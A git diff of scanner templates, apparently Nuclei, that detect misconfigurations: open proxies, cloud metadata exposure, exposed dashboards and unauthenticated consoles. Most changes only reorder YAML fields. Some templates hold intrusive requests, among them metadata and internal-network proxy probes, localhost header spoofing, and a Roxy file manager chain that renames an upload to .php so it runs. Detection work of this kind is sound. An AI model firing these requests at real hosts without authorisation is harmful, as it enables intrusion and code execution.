enumeration on localhost or # inside the private network. - info: name: Amazon AWS Metadata Service Check author: sullo,DhiyaneshDk severity: critical description: The host is configured as a proxy which allows access to the metadata provided by a cloud provider such as AWS or OVH. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - https://twitter.com/Random_Robbie/status/1268186743657947137 - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery# - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - tags: exposure,proxy,aws,amazon,misconfig,metadata metadata: max-request: 4 + tags: exposure,proxy,aws,amazon,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/proxy/metadata-azure.yaml b/http/misconfiguration/proxy/metadata-azure.yaml index af97724fea..54cb1aa855 100644 --- a/http/misconfiguration/proxy/metadata-azure.yaml +++ b/http/misconfiguration/proxy/metadata-azure.yaml @@ -7,12 +7,12 @@ id: metadata-service-azure # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Microsoft Azure Cloud Metadata Service Check author: sullo severity: critical description: The Microsoft Azure cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=windows - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -21,10 +21,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,azure,microsoft,proxy,misconfig,metadata metadata: max-request: 2 + tags: exposure,config,azure,microsoft,proxy,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/proxy/metadata-digitalocean.yaml b/http/misconfiguration/proxy/metadata-digitalocean.yaml index 9a79f24d98..7f48325a84 100644 --- a/http/misconfiguration/proxy/metadata-digitalocean.yaml +++ b/http/misconfiguration/proxy/metadata-digitalocean.yaml @@ -7,12 +7,12 @@ id: metadata-service-digitalocean # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: DigitalOcean Metadata Service Check author: sullo severity: critical description: The DigitalOcean host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://developers.digitalocean.com/documentation/metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -21,10 +21,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,digitalocean,proxy,misconfig,metadata metadata: max-request: 2 + tags: exposure,config,digitalocean,proxy,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/proxy/metadata-google.yaml b/http/misconfiguration/proxy/metadata-google.yaml index 5995cf9e18..1d4dad1e18 100644 --- a/http/misconfiguration/proxy/metadata-google.yaml +++ b/http/misconfiguration/proxy/metadata-google.yaml @@ -7,12 +7,12 @@ id: metadata-service-gcp # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Google GCP Metadata Service Check author: sullo severity: critical description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://cloud.google.com/compute/docs/metadata/default-metadata-values - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -21,10 +21,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,google,gcp,proxy,misconfig,metadata metadata: max-request: 2 + tags: exposure,config,google,gcp,proxy,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/proxy/metadata-hetzner.yaml b/http/misconfiguration/proxy/metadata-hetzner.yaml index 1d8208e5bf..cfee0fe69b 100644 --- a/http/misconfiguration/proxy/metadata-hetzner.yaml +++ b/http/misconfiguration/proxy/metadata-hetzner.yaml @@ -7,12 +7,12 @@ id: metadata-service-hetzner # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Hetzner Cloud Metadata Service Check author: sullo severity: critical description: The Hetzner Cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.hetzner.cloud/#server-metadata - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -21,10 +21,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,hetzner,proxy,misconfig,metadata metadata: max-request: 2 + tags: exposure,config,hetzner,proxy,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/proxy/metadata-openstack.yaml b/http/misconfiguration/proxy/metadata-openstack.yaml index da85b784fb..7b5b80ef2e 100644 --- a/http/misconfiguration/proxy/metadata-openstack.yaml +++ b/http/misconfiguration/proxy/metadata-openstack.yaml @@ -4,15 +4,14 @@ id: metadata-service-openstack # IP or a name which resolves to the IP. A standard proxy request is made to # the proxy using the full metadata URL, which the proxy will fulfill to its # own metadata service. - # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Openstack Metadata Service Check author: sullo severity: critical description: The Openstack host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.openstack.org/nova/latest/admin/metadata-service.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -21,10 +20,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,openstack,proxy,misconfig,metadata metadata: max-request: 2 + tags: exposure,config,openstack,proxy,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/proxy/metadata-oracle.yaml b/http/misconfiguration/proxy/metadata-oracle.yaml index 47cb86a0a5..f388562490 100644 --- a/http/misconfiguration/proxy/metadata-oracle.yaml +++ b/http/misconfiguration/proxy/metadata-oracle.yaml @@ -7,12 +7,12 @@ id: metadata-service-oracle # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Oracle Cloud Metadata Service Check author: sullo severity: critical description: The Oracle cloud host is configured as a proxy which allows access to the instance metadata IMDSv1 service. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -21,10 +21,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,oracle,proxy,misconfig,metadata metadata: max-request: 2 + tags: exposure,config,oracle,proxy,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-external.yaml b/http/misconfiguration/proxy/open-proxy-external.yaml index 6a6c494ee1..ce6a534385 100644 --- a/http/misconfiguration/proxy/open-proxy-external.yaml +++ b/http/misconfiguration/proxy/open-proxy-external.yaml @@ -5,10 +5,10 @@ info: author: gtrrnr severity: medium description: The host is configured as a proxy which allows access to other hosts on the external network. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://en.wikipedia.org/wiki/Open_proxy - https://www.acunetix.com/vulnerabilities/web/apache-configured-to-run-as-proxy/ - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 @@ -32,6 +32,7 @@ http: Host: {{Hostname}} unsafe: true + matchers-condition: and matchers: - type: dsl diff --git a/http/misconfiguration/proxy/open-proxy-internal.yaml b/http/misconfiguration/proxy/open-proxy-internal.yaml index c86b9f0c55..b80116c29f 100644 --- a/http/misconfiguration/proxy/open-proxy-internal.yaml +++ b/http/misconfiguration/proxy/open-proxy-internal.yaml @@ -5,6 +5,7 @@ info: author: sullo severity: high description: The host is configured as a proxy which allows access to other hosts on the internal network. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -13,16 +14,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig,fuzz metadata: max-request: 25 + tags: exposure,config,proxy,misconfig,fuzz http: - raw: - |+ - GET / HTTP/1.1 - Host: {{Hostname}} + GET / HTTP/1.1 + Host: {{Hostname}} - |+ GET http://192.168.0.1/ HTTP/1.1 diff --git a/http/misconfiguration/proxy/open-proxy-localhost.yaml b/http/misconfiguration/proxy/open-proxy-localhost.yaml index 2d8d9aef98..9d578ccd0c 100644 --- a/http/misconfiguration/proxy/open-proxy-localhost.yaml +++ b/http/misconfiguration/proxy/open-proxy-localhost.yaml @@ -5,6 +5,7 @@ info: author: sullo severity: high description: The host is configured as a proxy which allows access to web ports on the host's internal interface. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -13,10 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig,fuzz metadata: max-request: 6 + tags: exposure,config,proxy,misconfig,fuzz http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-portscan.yaml b/http/misconfiguration/proxy/open-proxy-portscan.yaml index c2e0a914e3..05271a247b 100644 --- a/http/misconfiguration/proxy/open-proxy-portscan.yaml +++ b/http/misconfiguration/proxy/open-proxy-portscan.yaml @@ -5,6 +5,7 @@ info: author: sullo severity: high description: The host is configured as a proxy which allows access to its internal interface + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -13,10 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. - tags: exposure,config,proxy,misconfig,fuzz metadata: max-request: 8 + tags: exposure,config,proxy,misconfig,fuzz http: - raw: diff --git a/http/misconfiguration/puppetdb-dashboard.yaml b/http/misconfiguration/puppetdb-dashboard.yaml index 7116ff59da..c58579c852 100644 --- a/http/misconfiguration/puppetdb-dashboard.yaml +++ b/http/misconfiguration/puppetdb-dashboard.yaml @@ -7,11 +7,11 @@ info: description: PuppetDB dashboard was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'title:"PuppetDB: Dashboard"' tags: misconfig,exposure,puppetdb diff --git a/http/misconfiguration/put-method-enabled.yaml b/http/misconfiguration/put-method-enabled.yaml index 47f72579aa..344590bf0c 100644 --- a/http/misconfiguration/put-method-enabled.yaml +++ b/http/misconfiguration/put-method-enabled.yaml @@ -4,14 +4,12 @@ info: name: PUT Method Enabled author: xElkomy severity: high - description: The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into - the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or - other attacks. + description: The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks. reference: - https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled - tags: injection,misconfig metadata: max-request: 2 + tags: injection,misconfig,intrusive http: - raw: @@ -21,7 +19,6 @@ http: Content-Type: text/plain {{randstr}} - - | GET /testing-put.txt HTTP/1.1 Host: {{Hostname}} diff --git a/http/misconfiguration/questdb-console.yaml b/http/misconfiguration/questdb-console.yaml index 988840ae80..dda52d21fa 100644 --- a/http/misconfiguration/questdb-console.yaml +++ b/http/misconfiguration/questdb-console.yaml @@ -5,15 +5,15 @@ info: author: tess severity: medium description: QuestDB console was detected. + reference: + - https://questdb.io/docs/develop/web-console/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - https://questdb.io/docs/develop/web-console/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"QuestDB · Console" tags: misconfig,questdb,exposure @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/qvidium-management-system-exposed.yaml b/http/misconfiguration/qvidium-management-system-exposed.yaml index ea85918a78..3368dc1695 100644 --- a/http/misconfiguration/qvidium-management-system-exposed.yaml +++ b/http/misconfiguration/qvidium-management-system-exposed.yaml @@ -5,8 +5,8 @@ info: author: tess severity: medium metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"QVidium Management" tags: misconfig,qvidium @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index 0dcf11311e..e7a103341d 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"RabbitMQ Exporter" tags: rabbitmq,exposure,debug,misconfig diff --git a/http/misconfiguration/rack-mini-profiler.yaml b/http/misconfiguration/rack-mini-profiler.yaml index 82e00e1a00..ebb1b922b3 100644 --- a/http/misconfiguration/rack-mini-profiler.yaml +++ b/http/misconfiguration/rack-mini-profiler.yaml @@ -5,9 +5,9 @@ info: author: vzamanillo severity: high description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks. - tags: config,debug,rails,misconfig metadata: max-request: 1 + tags: config,debug,rails,misconfig http: - method: GET diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml index 46563d9b18..c08cebbc79 100644 --- a/http/misconfiguration/ray-dashboard.yaml +++ b/http/misconfiguration/ray-dashboard.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Ray Dashboard" tags: misconfig,exposure,ray diff --git a/http/misconfiguration/rekognition-image-validation.yaml b/http/misconfiguration/rekognition-image-validation.yaml index 725357199e..5a9eeca9e5 100644 --- a/http/misconfiguration/rekognition-image-validation.yaml +++ b/http/misconfiguration/rekognition-image-validation.yaml @@ -7,11 +7,11 @@ info: description: Rekognition Image Validation UI panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Rekognition Image Validation Debug UI" tags: misconfig,exposure diff --git a/http/misconfiguration/request-baskets-exposure.yaml b/http/misconfiguration/request-baskets-exposure.yaml index 26e6fc4ef0..27465f64d4 100644 --- a/http/misconfiguration/request-baskets-exposure.yaml +++ b/http/misconfiguration/request-baskets-exposure.yaml @@ -8,8 +8,8 @@ info: - https://notes.sjtu.edu.cn/s/MUUhEymt7# - https://github.com/entr0pie/CVE-2023-27163 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"request-baskets" tags: misconfig,requests-baskets,exposure diff --git a/http/misconfiguration/rethinkdb-admin-console.yaml b/http/misconfiguration/rethinkdb-admin-console.yaml index 4b12335f20..7ca49d4dd4 100644 --- a/http/misconfiguration/rethinkdb-admin-console.yaml +++ b/http/misconfiguration/rethinkdb-admin-console.yaml @@ -12,8 +12,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:969374472 tags: misconfig,rethinkdb,console,dashboard diff --git a/http/misconfiguration/roxyfileman-fileupload.yaml b/http/misconfiguration/roxyfileman-fileupload.yaml index a7d2abf091..2c7fd13a33 100644 --- a/http/misconfiguration/roxyfileman-fileupload.yaml +++ b/http/misconfiguration/roxyfileman-fileupload.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.8 cwe-id: CWE-434 metadata: - max-request: 4 verified: true + max-request: 4 google-query: intitle:"Roxy file manager" tags: misconfig,edb,roxy,fileman,rce,fileupload,intrusive @@ -46,7 +46,6 @@ http: ?> ------WebKitFormBoundary6rbEqFAMRkE0RAB7-- - - | POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1 Host: {{Hostname}} @@ -54,7 +53,6 @@ http: X-Requested-With: XMLHttpRequest f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php - - | POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1 Host: {{Hostname}} @@ -62,7 +60,6 @@ http: X-Requested-With: XMLHttpRequest f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php - - | GET /Uploads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} @@ -70,6 +67,7 @@ http: cookie-reuse: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/misconfiguration/s3-torrent.yaml b/http/misconfiguration/s3-torrent.yaml index 73c0fc8052..1f924457d5 100644 --- a/http/misconfiguration/s3-torrent.yaml +++ b/http/misconfiguration/s3-torrent.yaml @@ -7,11 +7,11 @@ info: description: Amazon S3 Torrent download was detected, which can allow a malicious user to download files. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: misconfig,aws,s3,bucket metadata: max-request: 1 + tags: misconfig,aws,s3,bucket http: - method: GET diff --git a/http/misconfiguration/salesforce-aura.yaml b/http/misconfiguration/salesforce-aura.yaml index c83c441090..8c99985712 100644 --- a/http/misconfiguration/salesforce-aura.yaml +++ b/http/misconfiguration/salesforce-aura.yaml @@ -10,11 +10,11 @@ info: - https://github.com/Ph33rr/cirrusgo (test endpoint) classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: aura,unauth,salesforce,exposure,misconfig metadata: max-request: 5 + tags: aura,unauth,salesforce,exposure,misconfig http: - method: POST @@ -26,7 +26,6 @@ http: - "{{BaseURL}}/s/fact" body: "{}" - matchers: - type: word part: body diff --git a/http/misconfiguration/sap/sap-directory-listing.yaml b/http/misconfiguration/sap/sap-directory-listing.yaml index 981ea55303..60d3e3c764 100644 --- a/http/misconfiguration/sap/sap-directory-listing.yaml +++ b/http/misconfiguration/sap/sap-directory-listing.yaml @@ -4,9 +4,9 @@ info: name: SAP Directory Listing author: dhiyaneshDK severity: medium - tags: sap,listing,misconfig metadata: max-request: 1 + tags: sap,listing,misconfig http: - method: GET @@ -28,4 +28,4 @@ http: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header diff --git a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml index 7f2d3a6931..c60734df2f 100644 --- a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml +++ b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml @@ -28,4 +28,4 @@ http: - type: regex part: body regex: - - ".*" \ No newline at end of file + - ".*" diff --git a/http/misconfiguration/seeyon-unauth.yaml b/http/misconfiguration/seeyon-unauth.yaml index d00452661b..65bcadd845 100644 --- a/http/misconfiguration/seeyon-unauth.yaml +++ b/http/misconfiguration/seeyon-unauth.yaml @@ -8,8 +8,8 @@ info: - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg - https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="致远互联-OA" tags: misconfig,seeyon,unauth @@ -23,7 +23,6 @@ http: Accept-Encoding: deflate method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4 - - | GET /seeyon/main.do HTTP/1.1 Host: {{Hostname}} diff --git a/http/misconfiguration/selenium-exposure.yaml b/http/misconfiguration/selenium-exposure.yaml index db301f59f6..d35c1a0762 100644 --- a/http/misconfiguration/selenium-exposure.yaml +++ b/http/misconfiguration/selenium-exposure.yaml @@ -10,8 +10,8 @@ info: - https://nutcrackerssecurity.github.io/selenium.html - https://labs.detectify.com/2017/10/06/guest-blog-dont-leave-your-grid-wide-open/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "/wd/hub" tags: selenium,misconfiguration,rce,chromium @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/server-status-localhost.yaml b/http/misconfiguration/server-status-localhost.yaml index df60fe4dbf..f91a91894d 100644 --- a/http/misconfiguration/server-status-localhost.yaml +++ b/http/misconfiguration/server-status-localhost.yaml @@ -4,12 +4,13 @@ info: name: Server Status Disclosure author: pdteam,geeknik severity: low - tags: apache,debug,misconfig metadata: max-request: 1 + tags: apache,debug,misconfig http: - method: GET + headers: Forwarded: "127.0.0.1" X-Client-IP: "127.0.0.1" @@ -22,7 +23,6 @@ http: X-Remote-Addr: "127.0.0.1" X-Remote-IP: "127.0.0.1" X-True-IP: "127.0.0.1" - path: - "{{BaseURL}}/server-status" diff --git a/http/misconfiguration/server-status.yaml b/http/misconfiguration/server-status.yaml index c88fcb7389..9416e4d253 100644 --- a/http/misconfiguration/server-status.yaml +++ b/http/misconfiguration/server-status.yaml @@ -9,11 +9,11 @@ info: - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5527767173953778/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ServerStatus" tags: misconfig,serverstatus diff --git a/http/misconfiguration/service-pwd.yaml b/http/misconfiguration/service-pwd.yaml index f309f16ff3..0e5717b4ec 100644 --- a/http/misconfiguration/service-pwd.yaml +++ b/http/misconfiguration/service-pwd.yaml @@ -7,9 +7,9 @@ info: description: service.pwd was discovered, which is likely to contain sensitive information. reference: - https://www.exploit-db.com/ghdb/7256 - tags: exposure,listing,service,edb,misconfig metadata: max-request: 1 + tags: exposure,listing,service,edb,misconfig http: - method: GET diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/setup-github-enterprise.yaml index 1b0d1811b0..62e2686674 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/setup-github-enterprise.yaml @@ -5,8 +5,8 @@ info: author: tess severity: unknown metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1373456171 tags: panel,exposure,setup,github,misconfig diff --git a/http/misconfiguration/shell-history.yaml b/http/misconfiguration/shell-history.yaml index 70b21da387..6c62b04e05 100644 --- a/http/misconfiguration/shell-history.yaml +++ b/http/misconfiguration/shell-history.yaml @@ -5,9 +5,9 @@ info: author: pentest_swissky,geeknik severity: low description: Discover history for bash, ksh, sh, and zsh - tags: misconfig metadata: max-request: 4 + tags: misconfig http: - method: GET diff --git a/http/misconfiguration/sitecore-lfi.yaml b/http/misconfiguration/sitecore-lfi.yaml index 7eae20ad6f..bc5e82a9d5 100644 --- a/http/misconfiguration/sitecore-lfi.yaml +++ b/http/misconfiguration/sitecore-lfi.yaml @@ -7,8 +7,8 @@ info: reference: - https://blog.assetnote.io/2023/05/10/sitecore-round-two/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Sitecore" tags: sitecore,lfi,misconfig diff --git a/http/misconfiguration/skycaiji-install.yaml b/http/misconfiguration/skycaiji-install.yaml index ed40d0710e..b3b79c68ed 100644 --- a/http/misconfiguration/skycaiji-install.yaml +++ b/http/misconfiguration/skycaiji-install.yaml @@ -5,9 +5,9 @@ info: author: pikpikcu severity: high description: SkyCaiji was discovered. - tags: tech,skycaiji,exposure,misconfig metadata: max-request: 1 + tags: tech,skycaiji,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/slurm-hpc-dashboard.yaml b/http/misconfiguration/slurm-hpc-dashboard.yaml index 9cbf40e74c..217579491a 100644 --- a/http/misconfiguration/slurm-hpc-dashboard.yaml +++ b/http/misconfiguration/slurm-hpc-dashboard.yaml @@ -13,8 +13,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Slurm HPC Dashboard" tags: misconfig,slurm,dashboard diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml index ad807a9c61..a85fd94272 100644 --- a/http/misconfiguration/smarterstats-setup.yaml +++ b/http/misconfiguration/smarterstats-setup.yaml @@ -5,8 +5,8 @@ info: author: tess severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Welcome to SmarterStats!" tags: misconfig,smarterstats,exposure @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/smokeping-grapher.yaml b/http/misconfiguration/smokeping-grapher.yaml index f76daece6b..da0a618b97 100644 --- a/http/misconfiguration/smokeping-grapher.yaml +++ b/http/misconfiguration/smokeping-grapher.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=620494143454442&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SmokePing Latency Page for Network Latency Grapher" tags: misconfig,smokeping,latency,grapher @@ -26,4 +26,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/solr-query-dashboard.yaml b/http/misconfiguration/solr-query-dashboard.yaml index 6ade09b97c..6f4a8f3867 100644 --- a/http/misconfiguration/solr-query-dashboard.yaml +++ b/http/misconfiguration/solr-query-dashboard.yaml @@ -7,9 +7,9 @@ info: description: Solr's admin page was able to be accessed with no authentication requirements in place. reference: - https://www.exploit-db.com/ghdb/5856 - tags: solr,unauth,edb,misconfig metadata: max-request: 2 + tags: solr,unauth,edb,misconfig http: - method: GET diff --git a/http/misconfiguration/sonarqube-projects-disclosure.yaml b/http/misconfiguration/sonarqube-projects-disclosure.yaml index 5289281ade..437559bba9 100644 --- a/http/misconfiguration/sonarqube-projects-disclosure.yaml +++ b/http/misconfiguration/sonarqube-projects-disclosure.yaml @@ -10,8 +10,8 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/SonarQube/SonarQube%20search_projects%20%E9%A1%B9%E7%9B%AE%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://github.com/deletescape/sloot 